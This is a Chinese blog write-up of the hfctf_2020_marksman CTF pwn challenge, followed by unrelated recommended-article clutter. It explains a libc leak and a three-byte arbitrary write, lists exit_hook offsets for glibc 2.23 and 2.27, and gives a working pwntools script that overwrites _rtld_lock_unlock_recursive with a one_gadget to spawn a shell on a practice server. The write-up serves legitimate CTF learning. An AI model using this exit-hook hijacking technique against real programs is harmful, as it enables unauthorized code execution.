hfctf_2020_marksman

最新推荐文章于 2024-06-22 09:52:16 发布
最新推荐文章于 2024-06-22 09:52:16 发布
阅读量114 收藏 1
点赞数
分类专栏: pwn刷题 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73756460/article/details/131770214
版权

hfctf_2020_marksman

惯例我们先来checksec一下

保护全开的64位程序 放进ida64里看看

请添加图片描述

main函数

可以发现此处存在两个利用点

  1. 程序一开始就将puts_addr打印了出来因此我们可以不费吹灰之力的得到libc_base
  2. 我们可以修改任意地址的低三字节,而由于libc中都是6字节之内的因此这也就意味着我们可以将libc中的任意地址中的值修改为另一libc中地址的值

需要考虑到的是此程序开启了Full RELRO因此got表不可修改

因此我们考虑使用one_gadget的方法

请添加图片描述

然而当我们去查找one_gadget的时候就会发现我们所有的one_gadget都被禁用了

题目还十分诙谐的表示你不能总是期望有个金手指

请添加图片描述

请添加图片描述

看似山穷水尽了? 实际上并不是

如果你有仔细看过one_gadget的命令的话就应该知道此时给我们的知识条件最宽泛的几个gadget。只要我们执行one_gadget ./libc_name -l 1就可以显示出更多的one_gadget了

那么此时我们选择0x10a387作为我们的gadget

请添加图片描述

可能此时有师傅会有疑问 那我们got表无法使用 free和malloc这两个我们最常用的hook也没有我们应该将one_gadget写到哪里呢

我们的程序一般都是通过exit()来结束的 那么是否有exit_hook呢?答案是否定的 但是又类似功能的函数 以下是我们exit的函数调用链exit()->__run_exit_handlers->_dl_fini->__rtld_lock_unlock_recursive我们可以通过gdb调试来找到他的确切偏移

在libc-2.23中
exit_hook = libc_base+0x5f0040+3848

exit_hook = libc_base+0x5f0040+3856

在libc-2.27中

exit_hook = libc_base+0x619060+3840

exit_hook = libc_base+0x619060+3848

img

接下来我们只要将exit_hook篡改为one_gadget即可

exp:

from pwn import *

context(arch='amd64', os='linux', log_level='debug')
io = remote('node4.buuoj.cn', 26786)
elf = ELF("./hfctf_2020_marksman")


io.recvuntil('0x')
puts_addr = int(io.recv(12), 16)
print(hex(puts_addr))

libc = ELF('./libc-2.27.so')
libc_base = puts_addr - libc.sym['puts']
one_gadget_base = 0x10a387
one_gadget = one_gadget_base + libc_base
__rtld_lock_unlock_recursive_offset = 0x81df60
addr = libc_base + __rtld_lock_unlock_recursive_offset

io.sendlineafter("shoot!shoot!", str(addr))

for i in range(3):
    io.sendlineafter("biang!", chr(one_gadget & 0xff))
    one_gadget = one_gadget >> 8	#将one_gadget变量右移8位,以便获取下一个字节的值

io.interactive()

参考了z1r0师傅的 (82条消息) hfctf_2020_marksman_z1r0.的博客-CSDN博客

爱若 AI_ruo
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
利用realloc调整栈使one_gadget生效
N1rvana的博客
02-21 569
前言 当堆题保护全开的时候。PIE保护几乎使得unlink失效(除非能够计算出程序基址),FULL RELEO也使得函数GOT表不可修改。此时常覆盖各种函数的hook为one_gadget来getshell。 我常考虑的顺序是: free_hook->malloc_hook->IO_FILE->exit_hook 若有沙盒限制,则考虑setcontext 当free_hook不可打时(例如Fastbin Attack时free_hook前不能构造字节错位),我们往往就会打malloc_ho
hfctf_2020_marksman(劫持exit_hook或dlopen)
tbsqigongzi的博客
08-12 1054
劫持exit_hook或dlopen
BUUCTF pwn wp 141 - 145
fa1c4的blog
04-29 499
ciscn_2019_n_7 qctf_2018_stack2 falca@Ubuntu-2000:~/Desktop/qctf_2018_stack2$ file QCTF_2018_stack2;checksec QCTF_2018_stack2 QCTF_2018_stack2: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.
神枪手 THE MARKSMAN
guoqx的专栏
12-20 119
该片讲述了吉姆·汉森为了拯救名为米格尔的男孩的故事。
java关键字synchronized_深入理解synchronized关键字
weixin_29150151的博客
02-12 89
synchronized是并发编程中重要的使用工具之一,我们必须学会使用并且掌握它的原理。概念及作用JVM自带的关键字,可在需要线程安全的业务场景中使用,来保证线程安全。用法按照锁的对象区分可以分为对象锁和类锁按照在代码中的位置区分可以分为方法形式和代码块形式对象锁锁对象为当前this或者说是当前类的实例对象publicvoidsynchronizedmethod(){System.ou...
2020-08-19
weixin_44510620的博客
08-19 179
dc={ 'Jim':{ 'phone':['小米','华为','苹果'], 'notebook':{'联想':4000,'华硕':5000}, 'car':{'中国':['红旗','比亚迪','长城'], '美国':['福特','凯迪拉克'], '日本':['丰田','本田']}, }, 'Lucy':{ 'coat':['CK','HM','
推荐项目:Marksman - 打造高效资产管理系统新纪元
gitblog_00038的博客
06-22 290
推荐项目:Marksman - 打造高效资产管理系统新纪元 项目地址:https://gitcode.com/Scope-IT/marksman 在企业IT管理的浩瀚星空中,资产管理无疑是一项繁重而又至关重要的工作。为了解决这一痛点,我们为您隆重推介 Marksman —— 一款专为Snipe-IT设计的Windows代理工具,它如同一位精准的射手,让您的资产管理工作变得简单而高效。 ???? 项目介...
buuoj Pwn writeup 151-155
yongbaoii的博客
05-28 364
151 ciscn_2019_sw_1 保护 要注意到的是RELRO一点没开,这意味着.fini_array是可以覆盖的。 栈上的格式化字符串。 system也有了。 printf只能用一次,但是我们前面说.fini_array可以覆盖,所以我们第一次先覆盖它为main,制造循环,然后劫持scanf的got表,进行利用就好。 要注意的是在我们覆盖.fini_array的意思是在返回的时候以此调用里面的函数,而这个题.fini_array数组只有一个数组,所以我们只能通过它来返回一次main函数,所以我们一
用netfilter_queue在用户态实现NAT
woods2001的专栏
12-22 5820
偶尔在网上看到了>这篇文章, 并结合libnetfilter_queue-0.0.17.tar.bz2中的例子, 然后修改了一下tcp计算checksum部分,在linux2.6.24上用netfilter_queue在用户态实现NAT 程序功能: 将输出端目的地为 220.181.37.55 的包,都改为目的地为 202.118.236.130,输入段反之,达到DNAT的一小半功能,完
marksman_escape:在Rust中对HTML进行转义和转义
05-13
Rust中一个快速HTML编码和HTML解码实现。快…有点? 事实是,我只将实现与Python的html.encode和html.decode而...。。。。。。。... 无论如何,这是英特尔上的(完全不科学的)数字及其解释: test no_escape_bytes ......
gp2portfoliogame-Marksman7:gp2portfoliogame-Marksman7由GitHub Classroom创建
03-31
GameProgramming2决赛 游戏编程2最终模板 游戏名称: 说明简短: 说明长: 类型: 平台: 文件夹结构 \ src \ src \ packages \资产 \ docs \建造 \ build \ 0.1POC \ build \ 0.2VS \ build \ 0.3Final
ASP用户注册代码
01-10
用JAVA技术编程地用户注册常用代码。
markman取色
10-16
"MarkMan取色"是一款专为设计师和开发者打造的高效色彩选取工具,它允许用户直接从屏幕上的任何位置获取颜色的数值,以便在设计或编程过程中精确地匹配颜色。这款工具在IT行业中对于视觉设计、前端开发以及UI/UX工作...
SnoogensArenaMarksmanHunter:Aimsharp的竞技场射手猎人旋转
02-14
通过购买许可证解压缩并将Snoogens-Arena-Marksman-Hunter文件夹放在Aimsharp Rotations文件夹下,例如X:\AimsharpFolder\Bin\Rotations 购买后,将通过电子邮件收到的license.txt文件放在Snoogens-Arena-Marksman-...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8305
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
CCD式铆合测定机保养说明书.doc
最新发布
06-30
CCD式铆合测定机保养说明书
IOS操作系统开发/调试的案例
06-29
IOS操作系统开发/调试的案例 iOS操作系统开发和调试是一个复杂但非常有趣的过程。下面是一个简单的iOS应用开发案例,展示了如何使用Swift和Xcode开发一个基本的iOS应用,并进行调试。
【精美排版】基于STCC单片机的简易电子琴.doc
06-30
单片机
生成代码 利用pytorch实现英雄联盟中的角色识别
06-09
以下是用PyTorch实现英雄联盟中的角色识别的示例代码: 1. 数据预处理 ```python import torch import torchvision import torchvision.transforms as transforms # 定义数据预处理 transform = transforms.Compose( [transforms.Resize((224, 224)), transforms.ToTensor(), transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])]) # 加载数据集 trainset = torchvision.datasets.ImageFolder(root='train/', transform=transform) trainloader = torch.utils.data.DataLoader(trainset, batch_size=4, shuffle=True, num_workers=2) testset = torchvision.datasets.ImageFolder(root='test/', transform=transform) testloader = torch.utils.data.DataLoader(testset, batch_size=4, shuffle=False, num_workers=2) # 定义类别 classes = ('Assassin', 'Fighter', 'Mage', 'Marksman', 'Support', 'Tank') ``` 2. 构建模型 ```python import torch.nn as nn import torch.nn.functional as F # 定义神经网络模型 class Net(nn.Module): def __init__(self): super(Net, self).__init__() self.conv1 = nn.Conv2d(3, 6, 5) self.pool = nn.MaxPool2d(2, 2) self.conv2 = nn.Conv2d(6, 16, 5) self.fc1 = nn.Linear(16 * 53 * 53, 120) self.fc2 = nn.Linear(120, 84) self.fc3 = nn.Linear(84, 6) def forward(self, x): x = self.pool(F.relu(self.conv1(x))) x = self.pool(F.relu(self.conv2(x))) x = x.view(-1, 16 * 53 * 53) x = F.relu(self.fc1(x)) x = F.relu(self.fc2(x)) x = self.fc3(x) return x net = Net() ``` 3. 训练模型 ```python import torch.optim as optim # 定义损失函数和优化器 criterion = nn.CrossEntropyLoss() optimizer = optim.SGD(net.parameters(), lr=0.001, momentum=0.9) # 训练模型 for epoch in range(10): running_loss = 0.0 for i, data in enumerate(trainloader, 0): inputs, labels = data optimizer.zero_grad() outputs = net(inputs) loss = criterion(outputs, labels) loss.backward() optimizer.step() running_loss += loss.item() if i % 200 == 199: print('[%d, %5d] loss: %.3f' % (epoch + 1, i + 1, running_loss / 200)) running_loss = 0.0 ``` 4. 评估模型 ```python # 预测测试集结果 correct = 0 total = 0 with torch.no_grad(): for data in testloader: images, labels = data outputs = net(images) _, predicted = torch.max(outputs.data, 1) total += labels.size(0) correct += (predicted == labels).sum().item() # 计算准确率 accuracy = 100 * correct / total print('Accuracy: %d %%' % accuracy) ``` 这是一个简单的示例,实际中需要根据具体情况进行调整和优化。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值